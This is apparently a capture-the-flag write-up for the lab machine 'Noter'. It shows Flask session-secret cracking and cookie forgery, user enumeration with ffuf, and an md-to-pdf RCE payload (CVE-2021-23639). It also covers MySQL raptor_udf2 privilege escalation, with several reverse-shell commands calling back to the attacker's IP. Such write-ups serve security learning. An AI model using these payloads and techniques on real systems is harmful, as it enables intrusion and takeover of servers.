<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8" name="viewport" content="width=device-width, initial-scale=1">
<title>Noter Writeup</title>
<link rel="stylesheet" href="https://th3hat3d.github.io/styles.css">
<link rel="icon" href="https://th3hat3d.github.io/img/noter.webp" type="image/webp"/>
</head>
<body>
<b>Recon (nmap):</b>
<pre><code>Nmap scan report for 10.10.11.160  
Host is up (0.016s latency).  
Not shown: 997 closed ports  
PORT     STATE SERVICE VERSION  
21/tcp   open  ftp     vsftpd 3.0.3  
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)  
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)  
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10  
|_http-title: Noter  
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  
  
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds
</code></pre>
<p>We see three services open, and we can pretty much ignore SSH for now, as we don&#39;t have any credentials. The web server running Python is something I take note (rimshot) of for later. </p>
<p>We can try poking at FTP, but this requires credentials: </p>
<pre><code>Connected to 10.10.11.160.  
220 (vsFTPd 3.0.3)  
Name (10.10.11.160:th3hat3d): anonymous  
331 Please specify the password.  
Password:  
530 Login incorrect.  
Login failed.
</code></pre>
<b>Looking at the Web App</b>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterlanding.png"></img>
<p>We see that this is a note taking application, and we can register an account. </p>
<p>Since we can take notes, we can try XSS, but it seems like there&#39;s protection against it:</p>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterxss.png"></img>
<p>I look at my cookies, and the session cookie looks like a JWT:</p>
<pre><code>eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoidGhlaGF0ZWQifQ.YxdlLA._lcrtN-DCCQh4qMis3XX-5YZG_o
</code></pre>
<p>Opening it in JWT.io, the header looks good, but the payload looks off:</p>
<pre><code>{
  &quot;logged_in&quot;: true,
  &quot;username&quot;: &quot;thehated&quot;
}
</code></pre>
<pre><code>&quot;c\u0017e,&quot;
</code></pre>
<p>Knowing that this web server is running Python, it&#39;s possible that this is a Flask session cookie, as Python websites are often built with Flask.</p>
<p>A tool called flask-unsign will help us here. It deals with Flask cookies and will even try to brute force the signing secret. We can put our cookie in, and it cracks:</p>
<pre><code>thehated@debian:~$ flask-unsign --unsign --cookie &quot;eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoidGhlaGF0ZWQifQ.YxdlLA._lcrtN-DCCQh4qMis3XX-5YZG_o&quot; --no-literal-eval --wordlist ~/SecLists/Passwords/Leaked-Databases/rockyou.txt

[*] Session decodes to: {&#39;logged_in&#39;: True, &#39;username&#39;: &#39;thehated&#39;}  
[*] Starting brute-forcer with 8 threads..  
[+] Found secret key after 17152 attempts  
b&#39;secret123&#39;
</code></pre>
<p>But we don&#39;t have a username. Luckily, we can enumerate users at the sign in page. If I enter a wrong username:
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterwronguser.png"></img>
<p>But if we enter a correct username:</p>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterrightuser.png"></img>
<p>There is a different message for a valid user and wrong password.</p>
<p>We can enumerate valid users with ffuf and we find one pretty quick:</p>
<pre><code>thehated@debian:~$ ffuf -u http://10.10.11.160:5000/login --data &quot;username=FUZZ&amp;password=Noter&quot; -H &#39;Content-Type: application/x-www-form-urlencoded&#39; -w ~/SecLists/Usernames/xato-net-10-million-usernames.txt -mr &quot;Invalid login&quot;

       /&#39;___\  /&#39;___\           /&#39;___\          
      /\ \__/ /\ \__/  __  __  /\ \__/          
      \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\         
       \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/         
        \ \_\   \ \_\  \ \____/  \ \_\          
         \/_/    \/_/   \/___/    \/_/          
  
      v1.1.0  
________________________________________________  
  
:: Method           : POST  
:: URL              : http://10.10.11.160:5000/login  
:: Wordlist         : FUZZ: /home/thedoug/SecLists/Usernames/xato-net-10-million-usernames.txt  
:: Header           : Content-Type: application/x-www-form-urlencoded  
:: Data             : username=FUZZ&amp;password=Noter  
:: Follow redirects : false  
:: Calibration      : false  
:: Timeout          : 10  
:: Threads          : 40  
:: Matcher          : Regexp: Invalid login  
________________________________________________  
  
blue                    [Status: 200, Size: 2027, Words: 432, Lines: 69]
</code></pre>
<b>Forging the Cookie and Logging in as Blue</b>
<p>Using flask-unsign, we can also sign a cookie:</p>
<pre><code>thehated@debian:~$ flask-unsign --sign --secret secret123 --cookie &quot;{&#39;logged_in&#39;: True, &#39;username&#39;: &#39;blue&#39;}&quot;
eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.Yxds9g.fR2IP9wZhjGqa5LnmiegvwDGKJ0
</code></pre>
<p>Upon changing our cookie, we get signed in as Blue:</p>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterloggedin.png"></img>
<p>Crucially, we have a note from ftp_admin:</p>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noternote.png"></img>
<p>Now we can log in to FTP.</p>
<b>Enumerating FTP</b>
<p>Logging into FTP as blue, we see a file named &quot;policy.pdf&quot;, and download it:</p>
<pre><code>200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.  
drwxr-xr-x    2 1002     1002         4096 May 02 23:05 files  
-rw-r--r--    1 1002     1002        12569 Dec 24  2021 policy.pdf
</code></pre>
<p>The &quot;files&quot; directory is empty.</p>
<p>The pdf gives us info about passwords:</p>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterpdf.png"></img>
<p>Most crucially, it tells us that the password format is &quot;username@site_name!&quot;, and since blue&#39;s password was &quot;blue@Noter!&quot;, perhaps ftp_admin&#39;s password is &quot;ftp_admin@Noter!&quot;</p>
<p>RCE and shell as svc</p>
<p>We see two app backups:</p>
<pre><code>200 PORT command successful. Consider using PASV.  
150 Here comes the directory listing.  
-rw-r--r--    1 1003     1003        25559 Nov 01  2021 app_backup_1635803546.zip  
-rw-r--r--    1 1003     1003        26298 Dec 01  2021 app_backup_1638395546.zip  
226 Directory send OK.
</code></pre>
<p>We download these and look at them. They are backups of the web app, and one of them has a database password, which might be useful later:</p>
<pre><code>app.config[&#39;MYSQL_HOST&#39;] = &#39;localhost&#39;
app.config[&#39;MYSQL_USER&#39;] = &#39;root&#39;
app.config[&#39;MYSQL_PASSWORD&#39;] = &#39;Nildogg36&#39;
app.config[&#39;MYSQL_DB&#39;] = &#39;app&#39;
app.config[&#39;MYSQL_CURSORCLASS&#39;] = &#39;DictCursor&#39;
</code></pre>
<p>There is an md-to-pdf function in the backup, and we can see this on the web app too:</p>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterexport.png"></img>
<p>Looking for exploits in md-to-pdf, we see a poc script for CVE-2021-23639:</p>
<img src="https://raw.githubusercontent.com/th3hat3d/th3hat3d.github.io/master/img/noterpoc.png"></img>
<p>There is an error in the poc, &quot;jsn&quot; should be &quot;js\n&quot;. Since we can export directly from the cloud, we can host the poc and have it downloaded by the web app. My payload:</p>
<pre><code>---js\n((require(&quot;child_process&quot;)).execSync(&quot;bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.16.14/1337 0&gt;&amp;1&#39;&quot;))\n---RCE
</code></pre>
<p>After we export from cloud on the web app, we look at nc:</p>
<pre><code>thehated@debian:~$ nc -lnvp 1337  
listening on [any] 1337 ...  
connect to [10.10.16.14] from (UNKNOWN) [10.10.11.160] 50624  
/bin/bash: 1&quot;))\n---RCE: ambiguous redirect
</code></pre>
<p>The problem with the payload is the ambigious redirects that it has, as indicated by the error message. A reverse shell better suited for this would be the classic mkfifo shell, so we&#39;ll try that:</p>
<pre><code>---js\n((require(&quot;child_process&quot;)).execSync(&quot;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.10.16.14 1337 &gt;/tmp/f&quot;))\n---RCE
</code></pre>
<p>And at nc, it works:</p>
<pre><code>listening on [any] 1337 ...  
connect to [10.10.16.14] from (UNKNOWN) [10.10.11.160] 50710  
sh: 0: can&#39;t access tty; job control turned off  
$
</code></pre>
<p>And we can grab user.txt here too:</p>
<pre><code>svc@noter:~$ ls  
app  user.txt  
svc@noter:~$
</code></pre>
<p>Privilege Escalation: svc to root</p>
<p>Running, linpeas, we see something dangerous:</p>
<pre><code>╔══════════╣ MySQL                                                                                                                                                                 
mysql  Ver 15.1 Distrib 10.3.32-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2                                                                                          
MySQL user: root                                                                                                                                                                   
                                                                                                                                                                                  
═╣ MySQL connection using default root/root ........... No                                                                                                                         
═╣ MySQL connection using root/toor ................... No                                                                                                                         
═╣ MySQL connection using root/NOPASS ................. No                                                                                                                         
                                                                                                                                                                                  
╔══════════╣ Searching mysql credentials and exec                                                                                                                                  
From &#39;/etc/mysql/mariadb.conf.d/50-server.cnf&#39; Mysql user: user                    = root
</code></pre>
<p>MySQL is running as root, and not as the mysql user. This is vulnerable to the raptor_udf exploit, which can be found <a href="https://www.exploit-db.com/exploits/1518">here</a>.</p>
<p>First, we compile the exploit:</p>
<pre><code>svc@noter:~$ gcc -g -c raptor_udf2.c  
svc@noter:~$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc  
svc@noter:~$ ls  
app  linpeas.sh  raptor_udf2.c  raptor_udf2.o  raptor_udf2.so  user.txt  
svc@noter:~$
</code></pre>
<p>Those database creds from earlier come in handy here, as we need to be the root user to pull off this exploit:</p>
<pre><code>mysql -u root -pNildogg36  
Welcome to the MariaDB monitor.  Commands end with ; or \g.  
Your MariaDB connection id is 7074  
Server version: 10.3.32-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04  
  
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.  
  
Type &#39;help;&#39; or &#39;\h&#39; for help. Type &#39;\c&#39; to clear the current input statement.  
  
MariaDB [(none)]&gt;
</code></pre>
<p>In the raptor exploit code, it assumes that the plugins directory is /usr/lib:</p>
<pre><code>select * from foo into dumpfile &#39;/usr/lib/raptor_udf2.so&#39;;
</code></pre>
<p>But this is not the case here:</p>
<pre><code>MariaDB [(none)]&gt; show variables like &#39;%plugin%&#39;;    
+-----------------+---------------------------------------------+  
| Variable_name   | Value                                       |  
+-----------------+---------------------------------------------+  
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |  
| plugin_maturity | gamma                                       |  
+-----------------+---------------------------------------------+  
2 rows in set (0.001 sec)  
  
MariaDB [(none)]&gt;
</code></pre>
<p>Knowing this, we pull off the exploit:</p>
<pre><code>MariaDB [(none)]&gt; use mysql;  
Reading table information for completion of table and column names  
You can turn off this feature to get a quicker startup with -A  
  
Database changed  
MariaDB [mysql]&gt; create table foo(line blob);  
Query OK, 0 rows affected (0.009 sec)  
  
MariaDB [mysql]&gt; insert into foo values(load_file(&#39;/home/svc/raptor_udf2.so&#39;));      
Query OK, 1 row affected (0.002 sec)  
  
MariaDB [mysql]&gt; select * from foo into dumpfile &#39;/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so&#39;;  
Query OK, 1 row affected (0.001 sec)  
  
MariaDB [mysql]&gt; create function do_system returns integer soname &#39;raptor_udf2.so&#39;;  
Query OK, 0 rows affected (0.001 sec)  
  
MariaDB [mysql]&gt; select * from mysql.func;  
+-----------+-----+----------------+----------+  
| name      | ret | dl             | type     |  
+-----------+-----+----------------+----------+  
| do_system |   2 | raptor_udf2.so | function |  
+-----------+-----+----------------+----------+  
1 row in set (0.001 sec)  
  
MariaDB [mysql]&gt; select do_system(&#39;id &gt; /tmp/out; chown raptor.raptor /tmp/out&#39;);  
+----------------------------------------------------------+  
| do_system(&#39;id &gt; /tmp/out; chown raptor.raptor /tmp/out&#39;) |  
+----------------------------------------------------------+  
|                                                        0 |  
+----------------------------------------------------------+  
1 row in set (0.009 sec)  
  
MariaDB [mysql]&gt; \! sh  
$ cat /tmp/out  
cat: /tmp/out: Permission denied  
$ ls -l /tmp/out  
-rw-rw---- 1 root root 39 Sep  6 18:25 /tmp/out  
$
</code></pre>
<p>We can see that /tmp/out was written, and that it is, indeed owned by root. This proves that we have command execution as root. Doing a reverse shell:</p>
<pre><code>MariaDB [mysql]&gt; create table foo(line blob);  
Query OK, 0 rows affected (0.007 sec)  
  
MariaDB [mysql]&gt; insert into foo values(load_file(&#39;/home/svc/raptor_udf2.so&#39;));  
Query OK, 1 row affected (0.002 sec)  
  
MariaDB [mysql]&gt; select * from foo into dumpfile &#39;/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so&#39;;  
Query OK, 1 row affected (0.001 sec)  
  
MariaDB [mysql]&gt; create function do_system returns integer soname &#39;raptor_udf2.so&#39;;  
Query OK, 0 rows affected (0.000 sec)  
  
MariaDB [mysql]&gt; select do_system(&quot;bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.16.14/1337 0&gt;&amp;1&quot;);  
+-----------------------------------------------------------------+  
| do_system(&quot;bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.16.14/1337 0&gt;&amp;1&quot;) |  
+-----------------------------------------------------------------+  
|                                                               0 |  
+-----------------------------------------------------------------+  
1 row in set (0.002 sec)  
  
MariaDB [mysql]&gt; select do_system(&quot;bash -c &#39;bash -i &gt;&amp; /dev/tcp/10.10.16.14/1337 0&gt;&amp;1&#39;&quot;);
</code></pre>
<p>Slight hiccup on my part, but after correcting my mistake, it hangs, and at nc:</p>
<pre><code>listening on [any] 1337 ...  
connect to [10.10.16.14] from (UNKNOWN) [10.10.11.160] 51128  
bash: cannot set terminal process group (962): Inappropriate ioctl for device  
bash: no job control in this shell  
root@noter:/var/lib/mysql#
</code></pre>
<p>We&#39;re root!</p>
</body>
</html>
